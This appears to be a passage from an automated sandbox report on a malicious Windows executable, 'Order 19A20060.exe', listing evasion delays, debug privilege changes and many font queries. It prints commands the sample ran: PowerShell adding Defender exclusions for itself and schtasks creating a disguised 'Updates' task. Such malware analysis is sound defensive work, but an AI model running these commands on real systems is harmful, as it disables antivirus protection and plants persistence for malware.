                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 97218Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 97109Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 96998Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 96875Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 96765Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 96651Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 96531Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 96422Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 96312Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 96203Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 96094Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199937Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199828Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199718Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199609Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199500Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199390Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199281Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199172Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199062Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198953Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198844Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198719Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198609Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198500Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 100000
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 99890
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 99776
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 99672
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 99562
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 99453
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 99344
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 99234
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 99125
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 99016
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 98906
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 98797
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 98687
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 98578
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 98469
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 98359
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 98250
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 98140
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 98031
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 97922
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 97812
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 97703
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 97594
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 97484
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199953
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199844
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199734
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199625
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199515
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199406
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199297
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199187
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1199078
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198969
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198844
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198734
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198625
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198515
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198406
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198297
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198187
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1198078
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197969
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197859
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197750
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197640
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197531
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197422
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197312
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 1197202
                        Source: Order 19A20060.exe, 00000008.00000002.4094832519.00000000011B6000.00000004.00000020.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4094814261.0000000000D97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exeJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeMemory written: C:\Users\user\Desktop\Order 19A20060.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeMemory written: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exeJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmpJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess created: C:\Users\user\Desktop\Order 19A20060.exe C:\Users\user\Desktop\Order 19A20060.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Users\user\Desktop\Order 19A20060.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
